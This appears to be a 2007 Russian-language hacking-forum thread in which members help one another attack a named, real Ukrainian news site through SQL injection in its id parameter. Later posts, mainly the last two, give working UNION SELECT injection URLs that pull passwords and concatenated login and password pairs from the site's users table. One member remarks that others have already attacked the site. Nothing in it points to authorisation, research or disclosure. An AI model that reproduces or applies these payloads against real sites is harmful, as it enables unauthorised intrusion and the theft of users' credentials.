sql-inj запросы

Discussion in 'Уязвимости' started by muse, 20 Apr 2007.

  1. muse

    muse Elder - Старейшина

    Joined:
    25 Sep 2005
    Messages:
    28
    Likes Received:
    6
    Reputations:
    6
    есть сайт с уязвимым параметром page.php?id=35167

    подбор колонок показал что их две и есть таблица users но вытащить оттуда что либо неувенчалось успехом :(
    прав на запросы к msql. нету
    прошу помощи у профов
     
  2. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    поищи таблицы user user admin admins members и так далеее

    Кароче займись подбором Таблиц и колонок....
     
  3. muse

    muse Elder - Старейшина

    Joined:
    25 Sep 2005
    Messages:
    28
    Likes Received:
    6
    Reputations:
    6
    вы непоняли вопроса.
    я немогу вытащить оттуда инфу
    например есть таблица users и в ней есть параметр id
    но запрос union select 1,id from users ничего не выдает...
     
  4. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Линк дай.
    Млять какой же народ пошел.
     
  5. muse

    muse Elder - Старейшина

    Joined:
    25 Sep 2005
    Messages:
    28
    Likes Received:
    6
    Reputations:
    6
    http://daily.com.ua/analytics/page.php?id=35167
     
  6. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Помойму иньекция на этот сайт проведена кем то из наших, во всяком случае в антибояне линк есть
     
  7. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*
    http://daily.com.ua/analytics/page.php?id=-1+union+select+1,2/*
     
  8. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    втф? либо я слепой, либо лыжи не едут, но вывода в упор не вижу.

    http://daily.com.ua/analytics/page.php?id=3516+and(1=-1)+union+select+concat(login,char(95),password),6+from+users/*
     
    _________________________
    1 person likes this.